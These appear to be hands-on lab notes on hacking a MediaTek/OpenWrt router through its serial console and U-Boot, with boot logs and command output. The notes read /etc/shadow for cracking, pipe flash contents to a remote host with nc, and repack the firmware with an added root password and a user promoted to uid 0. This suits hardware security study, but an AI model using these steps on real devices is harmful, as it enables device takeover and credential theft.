Routers
Routers¶
Port 3890 Exploit:
https://github.com/Lyrebirds/sagemcom-fast-3890-exploit
Port 7230 Exploit:
https://github.com/Lyrebirds/technicolor-tc7230-exploit
Public Exploits¶
Hacking Routers
Extensively Adaptable Exploits and Tools for Encroaching on Router Security
juniper-pulse-flaw
Cisco Smart Install Exploitation Tool
SAP Vulnerabilities
VxWorks’ TCP/IP stack (IPnet)
Pulse Connect Secure - CVE-2019-11510
MIPS¶
MIPS uses two separate caches. One for Code and the other for Data. This makes shellcode exploitation weird. This can be fixed by calling sleep before the shellcode is executed. Also on ARM.
Getting Information¶
Check the Bootlog for interesting information including
- Flash Chip Used
- Used to find the size of the Chip
- Kernel Boot location
- Memory Map
Boot Log:
U-Boot 1.1.3 (Dec 9 2015 - 14:00:36)
SoC:MediaTek MT7620
DRAM: Memory Testing..65536K OK. is 64 MB
relocate_code Pointer at: 83fb0000
enable ephy clock...done. rf reg 29 = 5
SSC disabled.
******************************
Software System Reset Occurred
******************************
spi_wait_nsec: 29
spi device id: ef 40 17 0 0 (40170000)
Flash: W25Q64BV
*** Warning - bad CRC, using default environment
_______________________________________________________________
| ____ _ ____ |
| | _ \ __ _ _ __ __| | ___ _ __ __ _| __ ) _____ __ |
| | |_) / _` | '_ \ / _` |/ _ \| '__/ _` | _ \ / _ \ \/ / |
| | __/ (_| | | | | (_| | (_) | | | (_| | |_) | (_) > < |
| |_| \__,_|_| |_|\__,_|\___/|_| \__,_|____/ \___/_/\_\ |
| |
| Ralink/MTK SDK Plantform |
| Copyright 2005-2013 |
| Board:ZBT WR8305RT |
===============System Info==================
ASIC 7620_MP (Port5<->None)
DRAM component: 512 Mbits DDR, width 16
DRAM bus: 16 bit
Flash component: SPI Flash
CPU Speed: 580 MHZ
RAM Size:64 Mbytes
Build Date:Dec 9 2015 Time:14:00:36
============================================
GSW VLAN:LLLW
GPIO Init:
UARTF_SHARE_MODE:GPIO
I2C_GPIO_MODE:GPIO
init gpio20!
GPIO_MODE_REG:0x1a311d
ReadyLED Bit:0x1
Please choose the operation:
1: Load system code to SDRAM via TFTP.
2: Load system code then write to Flash via TFTP.
3: Boot system code via Flash (default).
4: Entr boot command line interface.
7: Load Boot Loader code then write to Flash via Serial.
9: Load Boot Loader code then write to Flash via TFTP. 0
3: System Boot system code via Flash.
Press Reset button enter upgrade mode!
## Booting image at bc050000 ...
Image Name: MIPS OpenWrt Linux-3.18.36
Image Type: MIPS Linux Kernel Image (lzma compressed)
Data Size: 1138908 Bytes = 1.1 MB
Load Address: 80000000
Entry Point: 80000000
Verifying Checksum ... OK
Uncompressing Kernel Image ... OK
No initrd
## Transferring control to Linux (at address 80000000) ...
## Giving linux memsize in MB, 64
Starting kernel ...
[ 0.000000] Linux version 3.18.36 (joefitz@linuxps) (gcc version 4.8.3 (OpenWrt/Linaro GCC 4.8-2014.04 r49404) ) #12 Mon Sep 12 21:47:16 PDT 2016
[ 0.000000] Board has DDR2
[ 0.000000] Analog PMU set to hw control
[ 0.000000] Digital PMU set to hw control
[ 0.000000] SoC Type: MediaTek MT7620N ver:2 eco:6
[ 0.000000] bootconsole [early0] enabled
[ 0.000000] CPU0 revision is: 00019650 (MIPS 24KEc)
[ 0.000000] MIPS: machine is ZBT WR8305RT
[ 0.000000] Determined physical RAM map:
[ 0.000000] memory: 04000000 @ 00000000 (usable)
[ 0.000000] Initrd not found or empty - disabling initrd
[ 0.000000] Zone ranges:
[ 0.000000] Normal [mem 0x00000000-0x03ffffff]
[ 0.000000] Movable zone start for each node
[ 0.000000] Early memory node ranges
[ 0.000000] node 0: [mem 0x00000000-0x03ffffff]
[ 0.000000] Initmem setup node 0 [mem 0x00000000-0x03ffffff]
[ 0.000000] Primary instruction cache 64kB, VIPT, 4-way, linesize 32 bytes.
[ 0.000000] Primary data cache 32kB, 4-way, PIPT, no aliases, linesize 32 bytes
[ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 16256
[ 0.000000] Kernel command line: console=ttyS0,115200 rootfstype=squashfs,jffs2
[ 0.000000] PID hash table entries: 256 (order: -2, 1024 bytes)
[ 0.000000] Dentry cache hash table entries: 8192 (order: 3, 32768 bytes)
[ 0.000000] Inode-cache hash table entries: 4096 (order: 2, 16384 bytes)
[ 0.000000] Writing ErrCtl register=00056700
[ 0.000000] Readback ErrCtl register=00056700
[ 0.000000] Memory: 61372K/65536K available (2515K kernel code, 124K rwdata, 516K rodata, 164K init, 186K bss, 4164K reserved)
[ 0.000000] SLUB: HWalign=32, Order=0-3, MinObjects=0, CPUs=1, Nodes=1
[ 0.000000] NR_IRQS:256
[ 0.000000] CPU Clock: 580MHz
[ 0.000000] systick: running - mult: 214748, shift: 32
[ 0.000000] Calibrating delay loop... 385.84 BogoMIPS (lpj=1929216)
[ 0.060000] pid_max: default: 32768 minimum: 301
[ 0.060000] Mount-cache hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.070000] Mountpoint-cache hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.070000] pinctrl core: initialized pinctrl subsystem
[ 0.080000] NET: Registered protocol family 16
[ 0.100000] rt2880_gpio 10000600.gpio: registering 24 gpios
[ 0.100000] rt2880_gpio 10000600.gpio: registering 24 irq handlers
[ 0.110000] rt2880_gpio 10000638.gpio: registering 16 gpios
[ 0.110000] rt2880_gpio 10000638.gpio: registering 16 irq handlers
[ 0.120000] rt2880_gpio 10000688.gpio: registering 1 gpios
[ 0.120000] rt2880_gpio 10000688.gpio: registering 1 irq handlers
[ 0.130000] Switched to clocksource systick
[ 0.130000] NET: Registered protocol family 2
[ 0.140000] TCP established hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.140000] TCP bind hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.150000] TCP: Hash tables configured (established 1024 bind 1024)
[ 0.150000] TCP: reno registered
[ 0.160000] UDP hash table entries: 256 (order: 0, 4096 bytes)
[ 0.160000] UDP-Lite hash table entries: 256 (order: 0, 4096 bytes)
[ 0.170000] NET: Registered protocol family 1
[ 0.170000] rt-timer 10000100.timer: maximum frequency is 2441Hz
[ 0.180000] futex hash table entries: 256 (order: -1, 3072 bytes)
[ 0.200000] squashfs: version 4.0 (2009/01/31) Phillip Lougher
[ 0.200000] jffs2: version 2.2 (NAND) (SUMMARY) (LZMA) (RTIME) (CMODE_PRIORITY) (c) 2001-2006 Red Hat, Inc.
[ 0.210000] msgmni has been set to 119
[ 0.230000] io scheduler noop registered
[ 0.230000] io scheduler deadline registered (default)
[ 0.230000] ralink-usb-phy usbphy: invalid resource
[ 0.240000] Serial: 8250/16550 driver, 2 ports, IRQ sharing disabled
[ 0.250000] console [ttyS0] disabled
[ 0.250000] 10000c00.uartlite: ttyS0 at MMIO 0x10000c00 (irq = 20, base_baud = 2500000) is a 16550A
[ 0.260000] console [ttyS0] enabled
[ 0.260000] console [ttyS0] enabled
[ 0.270000] bootconsole [early0] disabled
[ 0.270000] bootconsole [early0] disabled
[ 0.280000] m25p80 spi32766.0: found s25fl064k, expected mx25l6405d
[ 0.290000] m25p80 spi32766.0: s25fl064k (8192 Kbytes)
[ 0.290000] 4 ofpart partitions found on MTD device spi32766.0
[ 0.300000] Creating 4 MTD partitions on "spi32766.0":
[ 0.300000] 0x000000000000-0x000000030000 : "u-boot"
[ 0.310000] 0x000000030000-0x000000040000 : "u-boot-env"
[ 0.320000] 0x000000040000-0x000000050000 : "factory"
[ 0.320000] 0x000000050000-0x000000800000 : "firmware"
[ 0.390000] 2 uimage-fw partitions found on MTD device firmware
[ 0.390000] 0x000000050000-0x00000016611c : "kernel"
[ 0.400000] 0x00000016611c-0x000000800000 : "rootfs"
[ 0.400000] mtd: device 5 (rootfs) set to be root filesystem
[ 0.410000] 1 squashfs-split partitions found on MTD device rootfs
[ 0.420000] 0x000000340000-0x000000800000 : "rootfs_data"
[ 0.430000] ralink_soc_eth 10100000.ethernet: loaded mt7620 driver
[ 0.430000] ralink_soc_eth 10100000.ethernet eth0: ralink at 0xb0100000, irq 5
[ 0.440000] rt2880_wdt 10000120.watchdog: Initialized
[ 0.450000] TCP: cubic registered
[ 0.450000] NET: Registered protocol family 17
[ 0.450000] bridge: automatic filtering via arp/ip/ip6tables has been deprecated. Update your scripts to load br_netfilter if you need this.
[ 0.470000] 8021q: 802.1Q VLAN Support v1.8
[ 0.490000] VFS: Mounted root (squashfs filesystem) readonly on device 31:5.
[ 0.500000] Freeing unused kernel memory: 164K (80317000 - 80340000)
[ 3.000000] init: Console is alive
[ 3.000000] init: - watchdog -
[ 5.300000] usbcore: registered new interface driver usbfs
[ 5.300000] usbcore: registered new interface driver hub
[ 5.310000] usbcore: registered new device driver usb
[ 5.320000] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
[ 5.330000] ehci-platform: EHCI generic platform driver
[ 5.340000] phy phy-usbphy.0: remote usb device wakeup disabled
[ 5.350000] phy phy-usbphy.0: UTMI 16bit 30MHz
[ 5.350000] ehci-platform 101c0000.ehci: EHCI Host Controller
[ 5.360000] ehci-platform 101c0000.ehci: new USB bus registered, assigned bus number 1
[ 5.370000] ehci-platform 101c0000.ehci: irq 26, io mem 0x101c0000
[ 5.390000] ehci-platform 101c0000.ehci: USB 2.0 started, EHCI 1.00
[ 5.390000] hub 1-0:1.0: USB hub found
[ 5.400000] hub 1-0:1.0: 1 port detected
[ 5.400000] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver
[ 5.410000] ohci-platform: OHCI generic platform driver
[ 5.420000] ohci-platform 101c1000.ohci: Generic Platform OHCI controller
[ 5.420000] ohci-platform 101c1000.ohci: new USB bus registered, assigned bus number 2
[ 5.430000] ohci-platform 101c1000.ohci: irq 26, io mem 0x101c1000
[ 5.500000] hub 2-0:1.0: USB hub found
[ 5.500000] hub 2-0:1.0: 1 port detected
[ 6.000000] init: - preinit -
[ 6.630000] 8021q: adding VLAN 0 to HW filter on device eth0
[ 6.680000] random: mktemp urandom read with 10 bits of entropy available
Press the [�] key and hit [enter] to enter failsafe mode
Press the [1], [2], [3] or [4] key and hit [enter] to select the debug level
[ 8.050000] jffs2: notice: (301) jffs2_build_xattr_subsystem: complete building xattr subsystem, 0 of xdatum (0 unchecked, 0 orphan) and 0 of xref (0 dead, 0 orphan) found.
[ 8.070000] mount_root: switching to jffs2 overlay
[ 8.110000] procd: - early -
[ 8.110000] procd: - watchdog -
[ 9.050000] procd: - ubus -
[ 10.070000] procd: - init -
Please press Enter to activate this console.
[ 10.830000] NET: Registered protocol family 10
[ 10.840000] ip6_tables: (C) 2000-2006 Netfilter Core Team
[ 10.860000] Loading modules backported from Linux version v4.4-rc5-1913-gc8fdf68
[ 10.870000] Backport generated by backports.git backports-20151218-0-g2f58d9d
[ 10.880000] ip_tables: (C) 2000-2006 Netfilter Core Team
[ 10.900000] nf_conntrack version 0.5.0 (961 buckets, 3844 max)
[ 10.940000] xt_time: kernel timezone is -0000
[ 11.030000] PPP generic driver version 2.4.2
[ 11.040000] NET: Registered protocol family 24
[ 11.080000] ieee80211 phy0: rt2x00_set_rt: Info - RT chipset 5390, rev 0500 detected
[ 11.090000] ieee80211 phy0: rt2x00_set_rf: Info - RF chipset 7620 detected
[ 17.230000] 8021q: adding VLAN 0 to HW filter on device eth0
[ 17.250000] device eth0.1 entered promiscuous mode
[ 17.250000] device eth0 entered promiscuous mode
[ 17.270000] br-lan: port 1(eth0.1) entered forwarding state
[ 17.270000] br-lan: port 1(eth0.1) entered forwarding state
[ 19.270000] br-lan: port 1(eth0.1) entered forwarding state
Get File System Data:
root@OpenWrt:~# cat /proc/mtd
dev: size erasesize name
mtd0: 00030000 00010000 "u-boot"
mtd1: 00010000 00010000 "u-boot-env"
mtd2: 00010000 00010000 "factory"
mtd3: 007b0000 00010000 "firmware"
mtd4: 0011611c 00010000 "kernel"
mtd5: 00699ee4 00010000 "rootfs"
mtd6: 004c0000 00010000 "rootfs_data"
root@OpenWrt:~# df -h
Filesystem Size Used Available Use% Mounted on
rootfs 4.8M 276.0K 4.5M 6% /
/dev/root 2.0M 2.0M 0 100% /rom
tmpfs 30.0M 56.0K 30.0M 0% /tmp
/dev/mtdblock6 4.8M 276.0K 4.5M 6% /overlay
overlayfs:/overlay 4.8M 276.0K 4.5M 6% /
tmpfs 512.0K 0 512.0K 0% /dev
root@OpenWrt:~# mount
rootfs on / type rootfs (rw)
/dev/root on /rom type squashfs (ro,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,noatime)
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,noatime)
tmpfs on /tmp type tmpfs (rw,nosuid,nodev,noatime)
/dev/mtdblock6 on /overlay type jffs2 (rw,noatime)
overlayfs:/overlay on / type overlay (rw,noatime,lowerdir=/,upperdir=/overlay/upper,workdir=/overlay/work)
tmpfs on /dev type tmpfs (rw,nosuid,relatime,size=512k,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,mode=600)
debugfs on /sys/kernel/debug type debugfs (rw,noatime)
root@OpenWrt:~# ls -al /dev/mtd*
crw-r--r-- 1 root root 90, 0 Jan 1 1970 /dev/mtd0
crw-r--r-- 1 root root 90, 1 Jan 1 1970 /dev/mtd0ro
crw-r--r-- 1 root root 90, 2 Jan 1 1970 /dev/mtd1
crw-r--r-- 1 root root 90, 3 Jan 1 1970 /dev/mtd1ro
crw-r--r-- 1 root root 90, 4 Jan 1 1970 /dev/mtd2
crw-r--r-- 1 root root 90, 5 Jan 1 1970 /dev/mtd2ro
crw-r--r-- 1 root root 90, 6 Jan 1 1970 /dev/mtd3
crw-r--r-- 1 root root 90, 7 Jan 1 1970 /dev/mtd3ro
crw-r--r-- 1 root root 90, 8 Jan 1 1970 /dev/mtd4
crw-r--r-- 1 root root 90, 9 Jan 1 1970 /dev/mtd4ro
crw-r--r-- 1 root root 90, 10 Jan 1 1970 /dev/mtd5
crw-r--r-- 1 root root 90, 11 Jan 1 1970 /dev/mtd5ro
crw-r--r-- 1 root root 90, 12 Jan 1 1970 /dev/mtd6
crw-r--r-- 1 root root 90, 13 Jan 1 1970 /dev/mtd6ro
brw-r--r-- 1 root root 31, 0 Jan 1 1970 /dev/mtdblock0
brw-r--r-- 1 root root 31, 1 Jan 1 1970 /dev/mtdblock1
brw-r--r-- 1 root root 31, 2 Jan 1 1970 /dev/mtdblock2
brw-r--r-- 1 root root 31, 3 Jan 1 1970 /dev/mtdblock3
brw-r--r-- 1 root root 31, 4 Jan 1 1970 /dev/mtdblock4
brw-r--r-- 1 root root 31, 5 Jan 1 1970 /dev/mtdblock5
brw-r--r-- 1 root root 31, 6 Jan 1 1970 /dev/mtdblock6
Uboot Attacks¶
https://research.nccgroup.com/2020/07/22/depthcharge/
Boot into Uboot Mode¶
Press 4 to get into Uboot:
U-Boot 1.1.3 (Dec 9 2015 - 14:00:36)
SoC:MediaTek MT7620
DRAM: Memory Testing..65536K OK. is 64 MB
relocate_code Pointer at: 83fb0000
enable ephy clock...done. rf reg 29 = 5
SSC disabled.
******************************
Software System Reset Occurred
******************************
spi_wait_nsec: 29
spi device id: ef 40 17 0 0 (40170000)
Flash: W25Q64BV
*** Warning - bad CRC, using default environment
_______________________________________________________________
| ____ _ ____ |
| | _ \ __ _ _ __ __| | ___ _ __ __ _| __ ) _____ __ |
| | |_) / _` | '_ \ / _` |/ _ \| '__/ _` | _ \ / _ \ \/ / |
| | __/ (_| | | | | (_| | (_) | | | (_| | |_) | (_) > < |
| |_| \__,_|_| |_|\__,_|\___/|_| \__,_|____/ \___/_/\_\ |
| |
| Ralink/MTK SDK Plantform |
| Copyright 2005-2013 |
| Board:ZBT WR8305RT |
===============System Info==================
ASIC 7620_MP (Port5<->None)
DRAM component: 512 Mbits DDR, width 16
DRAM bus: 16 bit
Flash component: SPI Flash
CPU Speed: 580 MHZ
RAM Size:64 Mbytes
Build Date:Dec 9 2015 Time:14:00:36
============================================
GSW VLAN:LLLW
GPIO Init:
UARTF_SHARE_MODE:GPIO
I2C_GPIO_MODE:GPIO
init gpio20!
GPIO_MODE_REG:0x1a311d
ReadyLED Bit:0x1
Please choose the operation:
1: Load system code to SDRAM via TFTP.
2: Load system code then write to Flash via TFTP.
3: Boot system code via Flash (default).
4: Entr boot command line interface.
7: Load Boot Loader code then write to Flash via Serial.
9: Load Boot Loader code then write to Flash via TFTP.
You choosed 4
0
4: System Enter Boot Command Line Interface.
U-Boot 1.1.3 (Dec 9 2015 - 14:00:36)
MT7620 #
Modify Kernel Boot parameters¶
Get Kernel Boot Address:
[...]
Press Reset button enter upgrade mode!
## Booting image at bc050000 ...
Image Name: MIPS OpenWrt Linux-3.18.36
Image Type: MIPS Linux Kernel Image (lzma compressed)
Data Size: 1138908 Bytes = 1.1 MB
Load Address: 80000000
Entry Point: 80000000
Verifying Checksum ... OK
Uncompressing Kernel Image ... OK
No initrd
## Transferring control to Linux (at address 80000000) ...
## Giving linux memsize in MB, 64
[...]
Change Kernel Boot Options:
MT7620 # setenv bootargs console=ttyS0,115200 rootfstype=squashfs,jffs2 1 single
MT7620 # bootm bc050000
Cheking if New Boot Options are Set:
user@OpenWrt:~$ cat /proc/cmdline
console=ttyS0,115200 rootfstype=squashfs,jffs2
Since this is not set to the correct setenv the boot options are hard coded into the kernel.
Start Failsafe Mode¶
Set with falilsafe=true in the Arguments
user@OpenWrt:~$ cat /lib/preinit/30_failsafe_wait
#!/bin/sh
# Copyright (C) 2006-2010 OpenWrt.org
# Copyright (C) 2010 Vertical Communications
fs_wait_for_key () {
local timeout=$3
local timer
local do_keypress
local keypress_true="$(mktemp)"
local keypress_wait="$(mktemp)"
local keypress_sec="$(mktemp)"
if [ -z "$keypress_wait" ]; then
keypress_wait=/tmp/.keypress_wait
touch $keypress_wait
fi
if [ -z "$keypress_true" ]; then
keypress_true=/tmp/.keypress_true
touch $keypress_true
fi
if [ -z "$keypress_sec" ]; then
keypress_sec=/tmp/.keypress_sec
touch $keypress_sec
fi
trap "echo 'true' >$keypress_true; lock -u $keypress_wait ; rm -f $keypress_wait" INT
trap "echo 'true' >$keypress_true; lock -u $keypress_wait ; rm -f $keypress_wait" USR1
[ -n "$timeout" ] || timeout=1
[ $timeout -ge 1 ] || timeout=1
timer=$timeout
lock $keypress_wait
{
while [ $timer -gt 0 ]; do
echo "$timer" >$keypress_sec
timer=$(($timer - 1))
sleep 1
done
lock -u $keypress_wait
rm -f $keypress_wait
} &
echo "Press the [$1] key and hit [enter] $2"
echo "Press the [1], [2], [3] or [4] key and hit [enter] to select the debug level"
# if we're on the console we wait for input
{
while [ -r $keypress_wait ]; do
timer="$(cat $keypress_sec)"
[ -n "$timer" ] || timer=1
timer="${timer%%\ *}"
[ $timer -ge 1 ] || timer=1
do_keypress=""
{
read -t "$timer" do_keypress
case "$do_keypress" in
$1)
echo "true" >$keypress_true
;;
1 | 2 | 3 | 4)
echo "$do_keypress" >/tmp/debug_level
;;
*)
continue;
;;
esac
lock -u $keypress_wait
rm -f $keypress_wait
}
done
}
lock -w $keypress_wait
keypressed=1
[ "$(cat $keypress_true)" = "true" ] && keypressed=0
rm -f $keypress_true
rm -f $keypress_wait
rm -f $keypress_sec
return $keypressed
}
failsafe_wait() {
FAILSAFE=
grep -q 'failsafe=' /proc/cmdline && FAILSAFE=true && export FAILSAFE
if [ "$FAILSAFE" != "true" ]; then
pi_failsafe_net_message=true
preinit_net_echo "Please press button now to enter failsafe"
pi_failsafe_net_message=false
fs_wait_for_key � 'to enter failsafe mode' $fs_failsafe_wait_timeout && FAILSAFE=true
[ -f "/tmp/failsafe_button" ] && FAILSAFE=true && echo "- failsafe button "`cat /tmp/failsafe_button`" was pressed -"
[ "$FAILSAFE" = "true" ] && export FAILSAFE && touch /tmp/failsafe
fi
}
Copy and paste the ascii Character:
# Cat shadow and crack file
root@(none):/# cat /etc/shadow
root:$1$NJi50Ceq$H2TXojQhmmD/lS.I41mSp1:0:0:99999:7:::
root:$1$g1UlaVkd$ZNIs8OXZmUK.QQxY7IoAN/:0:0:99999:7:::
daemon:*:0:0:99999:7:::
ftp:*:0:0:99999:7:::
network:*:0:0:99999:7:::
nobody:*:0:0:99999:7:::
root@(none):/# cat /etc/passwd
root:x:0:0:root:/root:/bin/ash
user:x:1000:1000:user:/home/user:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
Dump Flash Memory over Serial¶
Using md to hexdump memory:
MT7620 # md 0xbc000000 0x800000
bc050000: 56190527 d1c425c5 0285d757 dc601100 '..V.%..W.....`.
bc050010: 00000080 00000080 44146a2e 03020505 .........j.D....
bc050020: 5350494d 65704f20 7472576e 6e694c20 MIPS OpenWrt Lin
bc050030: 332d7875 2e38312e 00003633 00000000 ux-3.18.36......
bc050040: 8000006d 3385ec00 00000000 6f000000 m......3.......o
bc050050: a3fffffd 50707fb7 71cda0fd c8db6e7a ......pP...qzn..
bc050060: a28c7a75 7573249e dcad593b 5a6dbcb1 uz...$su;Y....mZ
bc050070: 42f3879e dec27823 331f7d35 cfa6026a ...B#x..5}.3j...
bc050080: f58a34da e133a7a0 e1970fd1 a510c171 .4....3.....q...
bc050090: 2646f598 82be5343 218d3a43 0a5f5f08 ..F&CS..C:.!.__.
bc0500a0: 6770a520 6c35647c 18b9db33 818fb3a2 .pg|d5l3.......
bc0500b0: 1afa0e21 11740474 13d7fd80 7188e196 !...t.t........q
bc0500c0: fc056267 eaac3daa ae355791 98ed0ac0 gb...=...W5.....
bc0500d0: 308fe3d2 538374c3 95ebd005 ab5ea0ad ...0.t.S......^.
bc0500e0: 01b13c96 00a55ed2 e731a898 5d04ee15 .<...^....1....]
bc0500f0: 60aee688 918f6548 ae118519 6591c4d3 ...`He.........e
Use the uart_mem_dump.py program to programmatically get data and fix errors that can happen with uart
Dump Partitions over Netcat¶
Recieve Data:
bridings@lupin3:~/GDS/Labs/hardware
>>> netcat -l -p 1234 > mtd0
Dump memory over using nc:
root@OpenWrt:~# cat /dev/mtd0 | nc 192.168.1.153 1234
Dump Flash memory over TFTP¶
Start the Tftp Service:
>>> systemctl start tftpd-hpa.service
>>> cd /srv/tftp/
>>> sudo touch firmware.bin
>>> sudo chmod 666 firmware.bin
>>> ls /srv/tftp -l
total 0
-rw-rw-rw- 1 root root 0 Jun 28 19:13 firmware.bin
Write to the created file:
>>> tftp 0x82000000 firmware.bin 0x1000000
Modifying File Systems¶
Modifying a SquashFS partition¶
Find File:
>>> binwalk memory.bin
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
94560 0x17160 U-Boot version string, "U-Boot 1.1.3 (Dec 9 2015 - 14:00:36)"
94904 0x172B8 HTML document header
95967 0x176DF HTML document footer
96090 0x1775A HTML document header
96294 0x17826 HTML document footer
96408 0x17898 HTML document header
96940 0x17AAC HTML document footer
97052 0x17B1C HTML document header
97497 0x17CD9 HTML document footer
98693 0x18185 Copyright string: "Copyright 2005-2013 |"
327680 0x50000 uImage header, header size: 64 bytes, header CRC: 0xC525C4D1, created: 2016-09-13 04:48:02, image size: 1138908 bytes, Data Address: 0x80000000, Entry Point: 0x80000000, data CRC: 0x2E6A1444, OS: Linux, CPU: MIPS, image type: OS Kernel Image, compression type: lzma, image name: "MIPS OpenWrt Linux-3.18.36"
327744 0x50040 LZMA compressed data, properties: 0x6D, dictionary size: 8388608 bytes, uncompressed size: 3376620 bytes
1466652 0x16611C Squashfs filesystem, little endian, version 4.0, compression:xz, size: 1919250 bytes, 714 inodes, blocksize: 262144 bytes, created: 2016-09-13 04:47:23
3407872 0x340000 JFFS2 filesystem, little endian
Extract File system:
└──╼ $sudo unsquashfs _memory.bin.extracted/16611C.squashfs
Parallel unsquashfs: Using 1 processor
653 inodes (657 blocks) to write
[...]
created 468 files
created 61 directories
created 0 symlinks
created 0 devices
created 0 fifos
Modify a File:
#Generate a password
>>> mkpasswd -5 root
$1$we1TxRD6$GBiFEgOlEreUU6QF..99H0
#Insert password as root password
>>> cat ./etc/shadow
root:$1$NJi50Ceq$H2TXojQhmmD/lS.I41mSp1:0:0:99999:7:::
root:$1$g1UlaVkd$ZNIs8OXZmUK.QQxY7IoAN/:0:0:99999:7:::
root:$1$we1TxRD6$GBiFEgOlEreUU6QF..99H0:0:0:99999:7:::
daemon:*:0:0:99999:7:::
ftp:*:0:0:99999:7:::
network:*:0:0:99999:7:::
nobody:*:0:0:99999:7:::
#Change user uid to root
>>> cat ./etc/passwd
root:x:0:0:root:/root:/bin/ash
user:x:0:1000:user:/home/user:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
Repackage the FS:
#Find the block size of the partition using binwalk
>>> binwalk memory.bin
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
[...]
1466652 0x16611C Squashfs filesystem, little endian, version 4.0, compression:xz, size: 1919250 bytes, 714 inodes, blocksize: 262144 bytes, created: 2016-09-13 04:47:23
3407872 0x340000 JFFS2 filesystem, little endian
#
>>> mksquashfs squashfs-root myfs -comp xz -always-use-fragments -nopad -noappend -root-owned -b 262144
Parallel mksquashfs: Using 1 processor
Creating 4.0 filesystem on myfs, block size 262144.
[==========================================================================================================================|] 472/472 100%
Exportable Squashfs 4.0 filesystem, xz compressed, data block size 262144
compressed data, compressed metadata, compressed fragments,
compressed xattrs, compressed ids
duplicates are removed
Filesystem size 1892.16 Kbytes (1.85 Mbytes)
33.05% of uncompressed filesystem size (5725.16 Kbytes)
Inode table size 5326 bytes (5.20 Kbytes)
22.27% of uncompressed inode table size (23913 bytes)
Directory table size 6588 bytes (6.43 Kbytes)
46.63% of uncompressed directory table size (14127 bytes)
Number of duplicate files found 3
Number of inodes 713
Number of files 468
Number of fragments 19
Number of symbolic links 184
Number of device nodes 0
Number of fifo nodes 0
Number of socket nodes 0
Number of directories 61
Number of ids (unique uids + gids) 1
Number of uids 1
root (0)
Number of gids 1
root (0)
Repack the Flash File:
#Find Offset in the flash file
>>> binwalk memory.bin
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
94560 0x17160 U-Boot version string, "U-Boot 1.1.3 (Dec 9 2015 - 14:00:36)"
94904 0x172B8 HTML document header
95967 0x176DF HTML document footer
96090 0x1775A HTML document header
96294 0x17826 HTML document footer
96408 0x17898 HTML document header
96940 0x17AAC HTML document footer
97052 0x17B1C HTML document header
97497 0x17CD9 HTML document footer
98693 0x18185 Copyright string: "Copyright 2005-2013 |"
327680 0x50000 uImage header, header size: 64 bytes, header CRC: 0xC525C4D1, created: 2016-09-13 04:48:02, image size: 1138908 bytes, Data Address: 0x80000000, Entry Point: 0x80000000, data CRC: 0x2E6A1444, OS: Linux, CPU: MIPS, image type: OS Kernel Image, compression type: lzma, image name: "MIPS OpenWrt Linux-3.18.36"
327744 0x50040 LZMA compressed data, properties: 0x6D, dictionary size: 8388608 bytes, uncompressed size: 3376620 bytes
1466652 0x16611C Squashfs filesystem, little endian, version 4.0, compression:xz, size: 1919250 bytes, 714 inodes, blocksize: 262144 bytes, created: 2016-09-13 04:47:23
3407872 0x340000 JFFS2 filesystem, little endian
# Skip argument is the input file
# Seek argument is the output file
>>> dd if=_memory.bin.extracted/myfs of=memory.bin bs=1 seek=1466652 conv=notrunc
1926461 bytes (1.9 MB, 1.8 MiB) copied, 160 s, 12.0 kB/s
1937576+0 records in
1937576+0 records out
1937576 bytes (1.9 MB, 1.8 MiB) copied, 160.921 s, 12.0 kB/s
#Check the new updated file
>>> binwalk memory.bin
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
94560 0x17160 U-Boot version string, "U-Boot 1.1.3 (Dec 9 2015 - 14:00:36)"
94904 0x172B8 HTML document header
95967 0x176DF HTML document footer
96090 0x1775A HTML document header
96294 0x17826 HTML document footer
96408 0x17898 HTML document header
96940 0x17AAC HTML document footer
97052 0x17B1C HTML document header
97497 0x17CD9 HTML document footer
98693 0x18185 Copyright string: "Copyright 2005-2013 |"
327680 0x50000 uImage header, header size: 64 bytes, header CRC: 0xC525C4D1, created: 2016-09-13 04:48:02, image size: 1138908 bytes, Data Address: 0x80000000, Entry Point: 0x80000000, data CRC: 0x2E6A1444, OS: Linux, CPU: MIPS, image type: OS Kernel Image, compression type: lzma, image name: "MIPS OpenWrt Linux-3.18.36"
327744 0x50040 LZMA compressed data, properties: 0x6D, dictionary size: 8388608 bytes, uncompressed size: 3376620 bytes
1466652 0x16611C Squashfs filesystem, little endian, version 4.0, compression:xz, size: 1937576 bytes, 713 inodes, blocksize: 262144 bytes, created: 2021-07-06 18:36:47
3407872 0x340000 JFFS2 filesystem, little endian
Modifying the Kernel¶
- Extract with binwalk
- Load in ida and patch the kernel
- Recompress
- Load into firmware image
Recompress Kernel:
#Get the special version of lzma binary
>>> ../lzma
LZMA 4.65 : Igor Pavlov : Public domain : 2009-02-03
Usage: LZMA <e|d> inputFile outputFile [<switches>...]
e: encode file
d: decode file
b: Benchmark
<Switches>
-a{N}: set compression mode - [0, 1], default: 1 (max)
-d{N}: set dictionary size - [12, 30], default: 23 (8MB)
-fb{N}: set number of fast bytes - [5, 273], default: 128
-mc{N}: set number of cycles for match finder
-lc{N}: set number of literal context bits - [0, 8], default: 3
-lp{N}: set number of literal pos bits - [0, 4], default: 0
-pb{N}: set number of pos bits - [0, 4], default: 2
-mf{MF_ID}: set Match Finder: [bt2, bt3, bt4, hc4], default: bt4
-mt{N}: set number of CPU threads
-eos: write End Of Stream marker
-si: read data from stdin
-so: write data to stdout
